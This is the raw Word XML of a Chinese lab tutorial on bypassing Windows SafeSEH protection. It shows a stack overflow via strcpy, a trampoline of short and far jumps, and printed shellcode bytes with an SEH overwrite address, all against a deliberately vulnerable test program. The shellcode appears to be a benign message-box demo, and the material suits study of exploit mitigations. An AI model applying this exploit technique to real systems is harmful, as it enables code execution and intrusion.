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4D" w:rsidRDefault="00052786">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当异常处理函数在加载模块外时，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是直接校验通过的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052786" w:rsidRDefault="00052786">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以如果我们能找到一个跳转指令位于加载模块外，就可以绕过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的校验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&lt;stdio.h&gt;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&lt;string.h&gt;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&lt;windows.h&gt;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shellcode[]=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052786" w:rsidRP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90\x90\x90\x90\x90\x90\x90\x90"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DWORD MyException(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"There is an exception"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getchar();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input)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str[200];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strcpy(str,input);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zero=0;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__try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zero=1/zero;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__except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(MyException())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__asm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test(shellcode);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052786" w:rsidRDefault="00052786" w:rsidP="0005278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052786" w:rsidRDefault="00052786" w:rsidP="0005278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52786" w:rsidRDefault="00052786" w:rsidP="00052786">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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VS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2005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，生成Release版本，禁用优化</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052786" w:rsidRDefault="00052786">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先用插件来找找有没有，插件是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OllyFindAddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00052786" w:rsidRDefault="00052786">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="256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>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebp+n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00952590">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，标注出来的就是加载模块之外的跳转地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00052786" w:rsidRDefault="00952590">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3060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90" w:rsidRDefault="00952590">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后单步走完</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00952590" w:rsidRDefault="00952590">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0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90" w:rsidRDefault="00952590">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察此时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布局，根据你的系统计算shellcode长度，在S</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E.H防止跳板，然后调用异常的时候执行我们覆盖的跳板，接下来就会跳到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放置一个小跳转，往回跳10字节，在第二次跳转的位置放置一个大跳转，跳回shellcode起始地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00952590" w:rsidRDefault="00952590">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来解释下为什么这么放置指令：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00952590" w:rsidRDefault="00952590">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先我们的跳板存在00截断符，所以shellcode是不能放置在后面了，所以只能放置在前面，那么放置在前面我们只能控制它执行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处的指令至关重要，它要跳到shellcode的起始位置但是它只有4字节无法完成那么大的跳转，所以我们让它完成一个小跳转，跳10字节回去（这里是自己2字节加上8字节），然后在跳转回去的地址放置一个大跳转，那个大跳转就是跳回shellcode起始地址的关键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00952590" w:rsidRDefault="00952590">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改的代码是这样的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&lt;stdio.h&gt;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&lt;string.h&gt;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&lt;windows.h&gt;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shellcode[]=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"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"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"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"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"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"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"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"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"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"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"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"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"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"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"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"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"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"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"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"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"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"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"\xE9\x2B\xFF\xFF\xFF\x90\x90\x90"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machine code of far jump and \x90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lastRenderedPageBreak/>
        <w:t>"\xEB\xF6\x90\x90"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machine code of short jump and \x90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"\x0B\x0B\x28\x00"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address of call [ebp+30] in outside memory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DWORD MyException(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printf(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"There is an exception"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getchar();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input)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str[200];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strcpy(str,input);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zero=0;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__try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zero=1/zero;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__except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(MyException())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//__asm int 3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test(shellcode);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710A3" w:rsidRDefault="000710A3" w:rsidP="000710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52590" w:rsidRDefault="00122DD3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来看看效果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00122DD3" w:rsidRPr="00952590" w:rsidRDefault="00122DD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5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DD3" w:rsidRPr="0095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15"/>
    <w:rsid w:val="00052786"/>
    <w:rsid w:val="000710A3"/>
    <w:rsid w:val="00122DD3"/>
    <w:rsid w:val="002D0B4D"/>
    <w:rsid w:val="00734C15"/>
    <w:rsid w:val="009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401A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E0EF1A90-2BED-401B-8679-C1CDAADC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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-05-10T03:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-10T04:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>